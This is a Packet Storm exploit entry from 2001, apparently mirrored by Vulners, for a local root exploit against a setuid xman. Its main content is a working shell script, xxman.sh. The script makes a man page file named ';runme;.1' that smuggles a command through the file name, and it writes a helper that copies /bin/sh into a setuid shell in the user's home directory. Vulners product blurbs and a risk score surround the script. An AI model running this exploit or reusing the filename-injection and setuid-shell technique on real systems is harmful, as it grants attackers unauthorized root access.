Lucene search
K

xxman.sh

🗓️ 18 Jul 2001 00:00:00Reported by vade79Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

xman supports privileges without dropping them, making exploitation easier through system calls.

Code
`xman doesn't drop privileges anywheres in the   
program. but, does support suid installation. so,   
exploiting via a system call is much easier than the  
buffer overflow in MANPATH, mentioned in another   
bugtraq posting. here is an example of such an  
exploitation possibility:  
  
-- xxman.sh --  
  
#!/bin/sh  
# example of xman exploitation. xman  
# supports privileges. but, never  
# drops them.  
# Vade79 -> [email protected] -> realhalo.org.   
MANPATH=~/xmantest/  
mkdir -p ~/xmantest/man1  
cd ~/xmantest/man1  
touch ';runme;.1'  
cat << EOF >~/xmantest/runme  
#!/bin/sh  
cp /bin/sh ~/xmansh  
chown `id -u` ~/xmansh  
chmod 4755 ~/xmansh  
EOF  
chmod 755 ~/xmantest/runme  
echo "click the ';runme;' selection," \  
"exit. then, check for ~/xmansh."  
xman -bothshown -notopbox  
rm -rf ~/xmantest  
  
-- xxman.sh --  
  
Vade79 -> [email protected] -> realhalo.org.   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jul 2001 00:00Current
7.4High risk
Vulners AI Score7.4
17